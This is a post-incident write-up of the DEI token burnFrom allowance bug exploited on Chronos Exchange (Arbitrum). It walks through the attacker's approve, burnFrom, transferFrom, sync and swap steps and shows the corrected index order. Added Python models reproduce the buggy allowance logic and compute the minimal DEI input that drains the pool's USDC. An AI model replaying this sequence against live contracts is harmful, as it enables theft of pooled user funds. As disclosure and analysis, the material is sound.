# Attack Details

**By exploiting a bug in the DEI token's `burnFrom` implementation, the attacker could grant himself an allowance over the DEI held by the sAMM pair, transfer that DEI out of the pair, and swap it for a significant amount of USDC.**

This sequence of events led to a massive security breach and loss of user funds on Chronos Exchange on Arbitrum, and to losses on every other exchange on which the DEI token was listed.

An in-depth examination of the attack can be found by analyzing the following Arbitrum transaction: <https://explorer.phalcon.xyz/tx/arbitrum/0xb1141785b7b94eb37c39c37f0272744c6e79ca1517529fec3f4af59d4c3c37ef?line=25>

#### Here is a simplified explanation of the attacker's method and the steps taken:

The attacker takes advantage of a bug in the DEI token's `burnFrom` implementation, which lets the caller write an arbitrary allowance for themselves over any DEI holder's balance. Consequently, the attacker can move any DEI holder's funds.

### Step 1: The attacker calls DEI.burnFrom(account = sAMM Pair, amount = 0).

`burnFrom` reads `currentAllowance` from `_allowances[_msgSender()][account]`, i.e. the allowance the caller (the attacker) has granted *to* the sAMM pair, not the allowance the pair has granted to the caller. It then calls `_approve(account, _msgSender(), currentAllowance - amount)`, which with `amount = 0` is `_approve(sAMM, attacker, currentAllowance)`. Because the attacker controls `_allowances[attacker][sAMM]` (an ordinary `approve(sAMM, X)` sets it to any `X`, and `approve` never checks the caller's balance), the call writes an attacker-chosen allowance for the attacker over the pair's DEI. That allowed the attacker to spend any `currentAllowance` from the sAMM pair.

Link to the source code:\
<https://bscscan.com/address/0x1472b3081d81b792e697aea90accbbc4adc5baf9#code#F5#L308>

`_allowances[_msgSender()][account]`

should be

`_allowances[account][_msgSender()]`

### The exploitable burnFrom function:

{% code fullWidth="true" %}

```
    function burnFrom(address account, uint256 amount) public virtual {
        // BUG: indices are swapped. This is the allowance `account` holds over the
        // caller's tokens, a value the caller can set to anything via approve().
        uint256 currentAllowance = _allowances[_msgSender()][account];
        // That caller-controlled value is written as the caller's allowance over `account`.
        _approve(account, _msgSender(), currentAllowance - amount);
        _burn(account, amount);
    }
```

{% endcode %}

### The related \_approve function:

{% code lineNumbers="true" fullWidth="true" %}

```
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
```

{% endcode %}

### Step 2: The attacker abuses the broken `burnFrom` to increase his allowance, then calls `transferFrom` to move all DEI out of the pair.

<figure><img src="/files/mgNuaqobvbjrQfe9EJew" alt=""><figcaption></figcaption></figure>
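Steps 1 and 2 run end to end, as an added example in Python rather than the DEI contract's Solidity or anything the attacker ran: a minimal model of the token's balance and allowance bookkeeping with the buggy `burnFrom` beside the corrected one, so the same `approve`, `burnFrom(pair, 0)`, `transferFrom` sequence can be run against both. The addresses, the pool's DEI balance and the names `Token` and `run_exploit` are constructed for this example and are not part of the original page.

```python
"""Model of the DEI burnFrom allowance bug (added example, not the DEI contract).

Only the ERC20 state the bug touches is modelled: balances and
allowances[owner][spender] (how much `spender` may move out of `owner`).
"""

MAX_UINT256 = 2**256 - 1


class AllowanceError(Exception):
    """Stands in for the ERC20 'amount exceeds allowance' revert."""


class Token:
    def __init__(self, vulnerable: bool) -> None:
        self.vulnerable = vulnerable
        self.balances: dict[str, int] = {}
        self.allowances: dict[str, dict[str, int]] = {}

    def balance_of(self, account: str) -> int:
        return self.balances.get(account, 0)

    def allowance(self, owner: str, spender: str) -> int:
        return self.allowances.get(owner, {}).get(spender, 0)

    def _approve(self, owner: str, spender: str, amount: int) -> None:
        self.allowances.setdefault(owner, {})[spender] = amount

    def approve(self, sender: str, spender: str, amount: int) -> None:
        # Plain ERC20 approve: it never checks that `sender` actually holds `amount`.
        self._approve(sender, spender, amount)

    def _burn(self, account: str, amount: int) -> None:
        if self.balance_of(account) < amount:
            raise ValueError("burn amount exceeds balance")
        self.balances[account] = self.balance_of(account) - amount

    def burn_from(self, sender: str, account: str, amount: int) -> None:
        if self.vulnerable:
            # DEI bug: reads allowances[sender][account], the slot `sender` controls.
            current = self.allowance(sender, account)
        else:
            # Correct: the allowance `account` granted to `sender`.
            current = self.allowance(account, sender)
        if current < amount:  # the `currentAllowance - amount` underflow revert
            raise AllowanceError("burn amount exceeds allowance")
        # Both variants write the result into allowances[account][sender].
        self._approve(account, sender, current - amount)
        self._burn(account, amount)

    def transfer_from(self, sender: str, src: str, dst: str, amount: int) -> None:
        current = self.allowance(src, sender)
        if current < amount:
            raise AllowanceError("transfer amount exceeds allowance")
        if self.balance_of(src) < amount:
            raise ValueError("transfer amount exceeds balance")
        self._approve(src, sender, current - amount)
        self.balances[src] = self.balance_of(src) - amount
        self.balances[dst] = self.balance_of(dst) + amount


def run_exploit(vulnerable: bool, pool_dei: int = 1_000_000 * 10**18) -> dict:
    """Steps 1 and 2 of the write-up against a fresh token; returns the outcome."""
    PAIR, ATTACKER = "sAMM-pair", "attacker"  # constructed placeholder addresses
    t = Token(vulnerable)
    t.balances[PAIR] = pool_dei               # the pool holds DEI, the attacker none

    # Pre-step: the attacker grants PAIR an allowance over the attacker's own empty
    # balance. This fills allowances[attacker][pair], the slot the buggy burnFrom reads.
    t.approve(ATTACKER, PAIR, MAX_UINT256)

    # Step 1: burnFrom(account = pair, amount = 0)
    #   -> _approve(pair, attacker, currentAllowance - 0)
    t.burn_from(ATTACKER, PAIR, 0)
    granted = t.allowance(PAIR, ATTACKER)

    # Step 2: transferFrom(pair -> attacker) for the pool's entire DEI balance.
    try:
        t.transfer_from(ATTACKER, PAIR, ATTACKER, pool_dei)
    except AllowanceError:
        pass  # the corrected burnFrom leaves the allowance at 0, so this reverts
    return {
        "pair_allowance_to_attacker": granted,
        "attacker_dei": t.balance_of(ATTACKER),
        "pair_dei": t.balance_of(PAIR),
    }
```

Against the vulnerable variant, `burnFrom(pair, 0)` copies the attacker's self-chosen `approve` value into the pair's allowance to the attacker and the following `transferFrom` empties the pool; against the corrected variant the same call leaves that allowance at zero and the `transferFrom` reverts. The pre-step `approve` is the detail the summary above leaves implicit: the buggy read is of the attacker's own row of the allowance table, which the attacker can fill without holding a single DEI.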

### Step 3: The attacker calls sAMM.sync()

`sync()` overwrites the pair's cached reserves with its current token balances. After the `transferFrom` in Step 2 the pair holds essentially no DEI, so after calling `sync`:

* DEI `reserve0` is 1 (a single wei of DEI),
* USDC `reserve1` is 5,047,470,472,573 (USDC has 6 decimals, so roughly 5,047,470 USDC).

<figure><img src="/files/uCNt2vB44E07MGu34Ntu" alt=""><figcaption></figcaption></figure>

### Step 4: The attacker calls swap() and trades the difference.

The pair's invariant is now computed from reserves of 1 wei of DEI against about 5 million USDC, so a negligible amount of DEI satisfies the swap's invariant check and the attacker takes essentially the entire USDC reserve: 0 DEI is worth 5 million USDC now.

<figure><img src="/files/9bRCeyR8djW8MjY0WZax" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/x0RZKUc8hCiv6wwtL4pz" alt=""><figcaption></figcaption></figure>
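Why one `sync()` followed by one `swap()` moved the whole USDC reserve, as an added example that is not Chronos, Solidly or attacker code: a Python model of a Solidly-style stable pair's `sync()` and of the invariant check that `swap()` enforces. It assumes the `x^3*y + x*y^3` stable invariant on reserves normalised to 18 decimals, token0 = DEI (18 decimals) and token1 = USDC (6 decimals), ignores swap fees, and starts from the post-drain balances quoted above; `StablePair`, `stable_k`, `min_dei_in` and `drain_after_sync` are names chosen for this example.

```python
"""Steps 3 and 4 on a model of a Solidly-style stable (sAMM) pair.

Added example, not Chronos or Solidly code. Assumptions: the pair checks the
stable invariant x^3*y + x*y^3 on 18-decimal-normalised reserves, swap fees are
ignored, token0 = DEI (18 decimals), token1 = USDC (6 decimals).
"""

DEI_ONE = 10**18   # 1 DEI
USDC_ONE = 10**6   # 1 USDC


def stable_k(x: int, y: int, dec0: int = DEI_ONE, dec1: int = USDC_ONE) -> int:
    """Assumed Solidly _k() for a stable pair: normalise both reserves to 18
    decimals, then x*y*(x^2 + y^2) with 1e18 fixed-point scaling."""
    _x = x * 10**18 // dec0
    _y = y * 10**18 // dec1
    _a = _x * _y // 10**18
    _b = _x * _x // 10**18 + _y * _y // 10**18
    return _a * _b // 10**18


class StablePair:
    def __init__(self, balance0: int, balance1: int) -> None:
        self.balance0, self.balance1 = balance0, balance1  # actual token balances
        self.reserve0, self.reserve1 = 0, 0                # cached reserves

    def sync(self) -> None:
        """Step 3: cached reserves are overwritten with the token balances."""
        self.reserve0, self.reserve1 = self.balance0, self.balance1

    def swap_ok(self, amount0_in: int, amount1_out: int) -> bool:
        """The K check: post-swap balances must keep the invariant at or above
        the value implied by the cached reserves."""
        if amount1_out > self.balance1:
            return False
        new0 = self.balance0 + amount0_in
        new1 = self.balance1 - amount1_out
        return stable_k(new0, new1) >= stable_k(self.reserve0, self.reserve1)

    def swap(self, amount0_in: int, amount1_out: int) -> None:
        """Step 4: apply the swap if the K check passes, then refresh reserves."""
        if not self.swap_ok(amount0_in, amount1_out):
            raise ValueError("K")
        self.balance0 += amount0_in
        self.balance1 -= amount1_out
        self.sync()


def min_dei_in(pair: StablePair, usdc_out: int, hi: int = 10**30) -> int:
    """Smallest DEI input (in wei) that lets `usdc_out` leave the pool.
    Binary search is valid because stable_k is monotone in x."""
    lo = 0
    while lo < hi:
        mid = (lo + hi) // 2
        if pair.swap_ok(mid, usdc_out):
            hi = mid
        else:
            lo = mid + 1
    return lo


def drain_after_sync(dei_left: int = 1, usdc_left: int = 5_047_470_472_573,
                     dust: int = USDC_ONE) -> dict:
    """Reproduce steps 3 and 4 from the post-transferFrom balances: sync(), then
    take every USDC but `dust` out for the least DEI the K check accepts."""
    pair = StablePair(dei_left, usdc_left)
    # A 1M DEI / 1M USDC pool, for scale: the invariant a healthy pool defends.
    healthy_k = stable_k(1_000_000 * DEI_ONE, 1_000_000 * USDC_ONE)
    pair.sync()
    usdc_out = usdc_left - dust
    dei_in = min_dei_in(pair, usdc_out)
    pair.swap(dei_in, usdc_out)
    return {
        "k_after_sync": stable_k(dei_left, usdc_left),
        "k_healthy_1m_pool": healthy_k,
        "dei_in": dei_in,
        "usdc_out": usdc_out,
        "reserves_after": (pair.reserve0, pair.reserve1),
    }
```

Once the reserves are (1 wei of DEI, about 5.05M USDC) the invariant the pool defends is roughly 22 orders of magnitude below that of a healthy 1M/1M pool. The search shows that about 5 DEI, under these assumptions, is all the pool asks for in exchange for every USDC but one, which is the "0 DEI is worth 5M USDC" outcome described above; sending in exactly 0 DEI still fails the check, so some DEI has to go in.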

### Step 5: The attacker transfers DEI back

This step allowed for massive further damages: the pair was left holding a DEI reserve far larger than its remaining USDC, i.e. a pool that priced DEI at close to zero.

<figure><img src="/files/DLvYjdJo6K2Q1ImKNuTY" alt=""><figcaption></figcaption></figure>


The attacker's accrued profit was approximately $5 million, yet the consequential damages far exceed this figure; based on our current analysis they are estimated at between $8 and $10 million before recovery of funds (see [recovering funds](/contracts/reimbursement-guide/dei-depeg.md#recovering-funds)).

Based on this step, we conjecture that the attacker opted for a rushed approach, likely fearing that someone else might discover the bug, or that his main goal was to cause maximum damage.

Read more about it [here](/contracts/reimbursement-guide/dei-depeg/incident-analytic-summary.md#exploiter-profile).

### Relevant Links:

1. Transaction leading to the hack: <https://arbiscan.io/tx/0xb1141785b7b94eb37c39c37f0272744c6e79ca1517529fec3f4af59d4c3c37ef>
2. Address holding funds after the attacker swapped USDC to WETH: <https://arbiscan.io/address/0x189cf534de3097c08b6beaf6eb2b9179dab122d1>

